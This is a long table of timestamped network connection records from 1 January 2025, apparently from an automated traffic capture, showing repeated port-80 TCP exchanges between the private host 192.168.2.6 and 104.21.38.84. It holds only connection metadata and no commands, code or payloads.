                                                                                                                  Jan 1, 2025 16:04:48.924058914 CET8062859104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:48.924129963 CET6285980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:48.924226046 CET6285980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:48.928980112 CET8062859104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:59.661369085 CET8062875104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:04:59.661465883 CET6287580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:59.661602020 CET6287680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:04:59.666980028 CET8062876104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.022629976 CET6287680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.028461933 CET8062876104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.162693024 CET8062876104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.360723972 CET6287680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.401999950 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.402658939 CET6287680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.406896114 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.407031059 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.407411098 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.407576084 CET8062876104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.407625914 CET6287680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.412179947 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.532305956 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.537544966 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.537607908 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.537748098 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.542476892 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.751718998 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.756705046 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.756720066 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.851932049 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.891953945 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.892287016 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:00.897079945 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:00.994281054 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.124025106 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.171957016 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.173193932 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.180232048 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.210680008 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.251333952 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.295567989 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.295711040 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.296370029 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.300601959 CET8062877104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.300658941 CET6287780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.300879002 CET8062878104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.300920963 CET6287880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.301201105 CET8062879104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.301266909 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.301384926 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.306122065 CET8062879104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.657741070 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.662749052 CET8062879104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.751426935 CET8062879104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.798223972 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:01.928286076 CET8062879104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:01.974638939 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.044979095 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.049933910 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:02.050028086 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.050138950 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.054953098 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:02.410936117 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.416110039 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:02.492063999 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:02.614471912 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:02.679586887 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:02.742288113 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.152307987 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.152879953 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.157447100 CET8062880104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.157495975 CET6288080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.157710075 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.157841921 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.158639908 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.163460970 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.517071009 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.521918058 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.621361017 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.673204899 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:03.890813112 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:03.938837051 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.013063908 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.013830900 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.018749952 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.018767118 CET8062881104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.018826962 CET6288180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.018851042 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.018954039 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.023735046 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.376919985 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.381807089 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.460128069 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.523567915 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.634454012 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.749303102 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.750189066 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.754364014 CET8062882104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.754415035 CET6288280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.755034924 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:04.755103111 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.755259037 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:04.759999037 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.110872984 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.115799904 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.226087093 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.267220020 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.403373003 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.454651117 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.535278082 CET6287980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.543515921 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.544471979 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.548553944 CET8062883104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.548621893 CET6288380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.549287081 CET8062884104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.549402952 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.549643993 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.554500103 CET8062884104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.907699108 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:05.912715912 CET8062884104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:05.991746902 CET8062884104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.034658909 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.225383043 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.226167917 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.230464935 CET8062884104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.230576992 CET6288480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.231218100 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.234720945 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.234827995 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.239852905 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.342648029 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.347645998 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.347724915 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.347851038 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.352685928 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.579879045 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.584906101 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.584927082 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.697710991 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.704610109 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.709484100 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.778599977 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.792331934 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:06.845103025 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:06.973418951 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.058881998 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.063860893 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.063874006 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.110778093 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.173253059 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.187211037 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.187371016 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.188021898 CET6288780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.192327976 CET8062885104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.192384958 CET6288580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.192619085 CET8062886104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.192689896 CET6288680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.192776918 CET8062887104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:07.192837954 CET6288780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:07.192972898 CET6288780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.106503963 CET6290280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.110688925 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.111413002 CET8062901104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.111670971 CET6290180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.111718893 CET8062902104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.111787081 CET6290280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.115550995 CET8062903104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.115628958 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.115751982 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.120543003 CET8062903104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.470345020 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.477426052 CET8062903104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.580741882 CET8062903104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.624722004 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.847147942 CET8062903104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.892014980 CET6290380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.970846891 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.975745916 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:18.975810051 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.975955963 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:18.980777025 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.329655886 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.334611893 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.439361095 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.486696959 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.803850889 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.846707106 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.919677019 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.919698000 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.924581051 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.924659967 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.924673080 CET8062904104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:19.924721003 CET6290480192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.924866915 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:19.929660082 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.283097982 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.287996054 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.368628979 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.423268080 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.632282019 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.673280001 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.750880957 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.752012968 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.755851030 CET8062905104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.755908966 CET6290580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.756828070 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:20.756921053 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.757061005 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:20.761769056 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.110872984 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.115799904 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.201152086 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.251405954 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.375013113 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.424715996 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.497174978 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.497939110 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.502258062 CET8062906104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.502361059 CET6290680192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.502804041 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.502901077 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.503000975 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.507812977 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.870722055 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:21.875598907 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:21.951795101 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.001414061 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.129998922 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.173302889 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.247096062 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.250720024 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.252156019 CET8062907104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.252291918 CET6290780192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.255922079 CET8062908104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.258771896 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.258938074 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.263734102 CET8062908104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.611027002 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.616025925 CET8062908104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.784152985 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.784691095 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.885637999 CET8062908104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.885710955 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.886019945 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.886085987 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.886142969 CET8062908104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.886208057 CET6290880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.886308908 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.891155958 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.909704924 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.914577961 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:22.914649963 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.914764881 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:22.919503927 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.235945940 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.240962029 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.240982056 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.267116070 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.272648096 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.331127882 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.367285013 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.376418114 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.407672882 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.506022930 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.533436060 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.550756931 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.579571962 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.655251026 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.655309916 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.657522917 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.660262108 CET8062909104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.660417080 CET6290980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.660492897 CET8062910104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.660788059 CET6291080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.662410975 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:23.662611008 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.662858009 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:23.667674065 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.017666101 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.023143053 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.116296053 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.157721043 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.379453897 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.423321009 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.503950119 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.505165100 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.509020090 CET8062911104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.509077072 CET6291180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.509970903 CET8062912104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.510040998 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.510246038 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.515122890 CET8062912104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.860953093 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:24.865912914 CET8062912104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:24.955985069 CET8062912104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.001436949 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.231698990 CET8062912104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.282696009 CET6291280192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.363751888 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.369616985 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.369781971 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.369966984 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.375720978 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.720323086 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:25.725265980 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.832030058 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:25.878726959 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:26.084997892 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:26.126739025 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:26.175348043 CET8062913104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:05:26.220335007 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:26.310745955 CET6291380192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:05:26.310753107 CET6291480192.168.2.6104.21.38.84
